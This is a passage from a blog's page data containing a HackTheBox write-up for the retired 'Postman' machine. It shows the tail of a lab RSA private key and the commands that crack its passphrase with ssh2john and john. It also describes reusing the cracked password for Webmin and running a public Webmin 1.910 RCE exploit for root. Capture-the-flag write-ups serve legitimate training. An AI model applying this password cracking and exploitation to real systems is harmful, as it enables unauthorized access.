Gmh\nKTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm\nnpAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ\nVcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W\nX+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw<span class=\"token operator\">==</span>\n-----END RSA PRIVATE KEY-----</code></pre></div>\n<p>If I could recover a password from somewhere on the machine, I might be able to decrypt it.</p>\n<p>I got stuck here, so I ran linpeas — but that did not reveal anything useful either, so I decided to try brute force.</p>\n<p>I cracked the password using the following commands:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># Crack the SSH key</span>\n$ python /usr/share/john/ssh2john.py id_rsa.txt <span class=\"token operator\">></span> id.hash\n$ john id.hash -wordlist<span class=\"token operator\">=</span>/usr/share/wordlists/rockyou.txt</code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 666px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/1467c3cffaffa38ffe14b7cb2d20c692/ace37/image-20220810210351540.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 17.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAq0lEQVQY042P2xKCIBRF+SnBnOTipRSdBEGt6f+/Y3ewmnpqeljDOnDYHJid7+jcht7fcL5EYsWxMrBjh3UNmOcJ2xYQgsN2jYjLvLv3E2L0dO6w0F57qpFlGZgdeioaOGoYR4uBiItHLgQ458jzfEdQLbj4+It3z9MFmNYKUpUwRiN5Wuu6QlEUxGEnXfqHFMqatqEQtYdIWaKm7yZXSkJTuKFHvif6CU34AOKji/ioS7rYAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/1467c3cffaffa38ffe14b7cb2d20c692/8ac56/image-20220810210351540.webp 240w,\n/static/1467c3cffaffa38ffe14b7cb2d20c692/d3be9/image-20220810210351540.webp 480w,\n/static/1467c3cffaffa38ffe14b7cb2d20c692/be082/image-20220810210351540.webp 666w\"\n              sizes=\"(max-width: 666px) 100vw, 666px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/1467c3cffaffa38ffe14b7cb2d20c692/8ff5a/image-20220810210351540.png 240w,\n/static/1467c3cffaffa38ffe14b7cb2d20c692/e85cb/image-20220810210351540.png 480w,\n/static/1467c3cffaffa38ffe14b7cb2d20c692/ace37/image-20220810210351540.png 666w\"\n            sizes=\"(max-width: 666px) 100vw, 666px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/1467c3cffaffa38ffe14b7cb2d20c692/ace37/image-20220810210351540.png\"\n            alt=\"image-20220810210351540\"\n            title=\"image-20220810210351540\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I decrypted the RSA key using the recovered passphrase, but attempting to use it for SSH still failed for some reason.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ openssl rsa -in encrypted -out decrypted</code></pre></div>\n<p>In the end, I used the SSH shell I had already obtained as redis and ran <code class=\"language-text\">su Matt</code> with the cracked password to get the User flag.</p>\n<h2 id=\"privilege-escalation\" style=\"position:relative;\"><a href=\"#privilege-escalation\" aria-label=\"privilege escalation permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Privilege Escalation</h2>\n<p>After getting Matt’s shell, checking the history showed a wide range of commands that had been executed.</p>\n<p>I started by running linpeas with Matt’s privileges, but nothing obviously useful for privilege escalation turned up.</p>\n<p>Next, on a hunch, I tried logging into WebAdmin with the username Matt and the same password — and it worked.</p>\n<p>The version was 1.910.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/30a1d6a8fed3d32beceabc0d2b9812e3/d4b10/image-20220810232032044.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 47.91666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB7klEQVQoz6VRTU8TURSdv6CioQSFNmJrRKMRpWEBce/SxK2ouDCG8BPUgi5cmRhdiDCC/A5WRKOm0eBHILixFmnno5k2M/PmzZs53vsmtOjWmZzcO/fed945d4xCfgRnRi9gOF/E0NAplE6fx0jxLIYLJRzrP4HDfQM4dCR3AAMHkOv2j/YfR26wAOPK9XsonSsjnz+JhcoCll4u4cWz5zBfmVg1V/Ca4vLiMszFLP4LnjMpvlldwwrBmJp9itFrcyhencHnrR/4nydNUxgTdx5j8u4TlGce4ePXHd0IwxBxrKCUohgjDAIEUYBIRlBUF0JASqlzngl86osAQgoYZSIs357H2I37qH7LFCZJorH/cK7JUpV9p4m+aF9Vt58oGOOk7PKtCi5OP8CHzW2aVpA0zIOs4i9iVkNquR7HUsee3wyacJwIL92sYKP6BY7VQECWmch1XXQ6Hfi+r61FkUCtVoPneWhTvdVy6QK/p5beLuHY9EO8+/Sd9tFBSDtiAsdx6FBLE7fbbb1bx3Ugowg+kVq2TXBIAM1TTf+UjHBeE77f3EJCVpTKdsjKmIRtClLHSlhxTFa9+m+4HvWFRCgVwr09Ohv3dsiW199WUf/1E/XdXdh0e7PZ7MKyLI1Go5HlrM6yyQWBcpvc8Jk/hGmQbvXWxtkAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/30a1d6a8fed3d32beceabc0d2b9812e3/8ac56/image-20220810232032044.webp 240w,\n/static/30a1d6a8fed3d32beceabc0d2b9812e3/d3be9/image-20220810232032044.webp 480w,\n/static/30a1d6a8fed3d32beceabc0d2b9812e3/e46b2/image-20220810232032044.webp 960w,\n/static/30a1d6a8fed3d32beceabc0d2b9812e3/7f80f/image-20220810232032044.webp 1394w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/30a1d6a8fed3d32beceabc0d2b9812e3/8ff5a/image-20220810232032044.png 240w,\n/static/30a1d6a8fed3d32beceabc0d2b9812e3/e85cb/image-20220810232032044.png 480w,\n/static/30a1d6a8fed3d32beceabc0d2b9812e3/d9199/image-20220810232032044.png 960w,\n/static/30a1d6a8fed3d32beceabc0d2b9812e3/d4b10/image-20220810232032044.png 1394w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/30a1d6a8fed3d32beceabc0d2b9812e3/d9199/image-20220810232032044.png\"\n            alt=\"image-20220810232032044\"\n            title=\"image-20220810232032044\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Looking at the linpeas output more carefully, I found that WebAdmin was running as root.</p>\n<p>I also confirmed that Webmin 1.910 is vulnerable to an RCE exploit that can be used when credentials are known.</p>\n<p>Reference: <a href=\"https://github.com/roughiz/Webmin-1.910-Exploit-Script\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">GitHub - roughiz/Webmin-1.910-Exploit-Script: Webmin 1.910 - Remote Code Execution Using Python Script</a></p>\n<p>I modified that exploit slightly and ran it, which successfully gave me a root shell.</p>\n<p>Done!!</p>","fields":{"slug":"/hackthebox-linux-postman-en","tagSlugs":["/tag/hack-the-box-en/","/tag/linux-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-08-09","description":"A writeup of the retired HackTheBox machine 'Postman'.","tags":["HackTheBox (en)","Linux (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Postman (Easy/Linux)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-linux-postman-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}